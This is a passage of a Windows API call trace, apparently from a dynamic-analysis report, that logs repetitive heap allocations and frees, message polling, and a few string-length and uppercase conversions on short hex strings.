RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717b8 | out: hHeap=0x2af0000) returned 1 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71888 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9490 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94a8 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718a8 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9490 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.329] lstrlenW (lpString="6F") returned 2 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94a8 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718a8 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.329] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.329] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71818 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9400 | out: hHeap=0x2af0000) returned 1 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718d8 | out: hHeap=0x2af0000) returned 1 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71818 | out: hHeap=0x2af0000) returned 1 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.330] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.330] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95f8 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718c8 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718c8 | out: hHeap=0x2af0000) returned 1 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71988 [0086.330] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.330] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71818 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0086.331] lstrlenW (lpString="6F") returned 2 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71818 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71988 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9400 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.331] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.331] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.331] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71988 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.331] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717a8 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95f8 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718a8 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718a8 | out: hHeap=0x2af0000) returned 1 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718c8 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718c8 | out: hHeap=0x2af0000) returned 1 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9490 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71998 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71998 | out: hHeap=0x2af0000) returned 1 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71998 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9490 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717a8 | out: hHeap=0x2af0000) returned 1 [0086.332] lstrlenW (lpString="6C") returned 2 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71998 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.332] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717f8 [0086.332] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9400 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717f8 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0086.333] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0086.333] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71988 [0086.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0086.333] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94c0 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77558 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71758 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a774e0 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa93d0 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71698 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a770d0 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a779b8 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77698 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9418 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71618 | out: hHeap=0x2af0000) returned 1 [0086.333] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9280 | out: hHeap=0x2af0000) returned 1 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71608 | out: hHeap=0x2af0000) returned 1 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9280 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9400 | out: hHeap=0x2af0000) returned 1 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94a8 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa93d0 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71608 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77698 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71758 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77710 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9490 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71698 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94a8 | out: hHeap=0x2af0000) returned 1 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a775f8 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0086.334] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a775f8 | out: hHeap=0x2af0000) returned 1 [0086.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71618 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0086.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9400 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71818 [0086.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71818 | out: hHeap=0x2af0000) returned 1 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0086.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9418 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a776e8 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0086.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77738 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94a8 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0086.335] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95f8 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71988 [0086.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95f8 | out: hHeap=0x2af0000) returned 1 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77648 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718e8 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77760 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718c8 [0086.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a779b8 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0086.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77648 | out: hHeap=0x2af0000) returned 1 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0086.336] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77620 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717f8 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94c0 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71988 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718a8 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9508 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71888 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71888 | out: hHeap=0x2af0000) returned 1 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9508 | out: hHeap=0x2af0000) returned 1 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718a8 | out: hHeap=0x2af0000) returned 1 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71988 [0086.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71988 | out: hHeap=0x2af0000) returned 1 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0086.336] PeekMessageW (in: lpMsg=0x8ceec0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceec0) returned 0 [0086.336] RtlAllocateHeap (HeapHandle=0x2af0000, 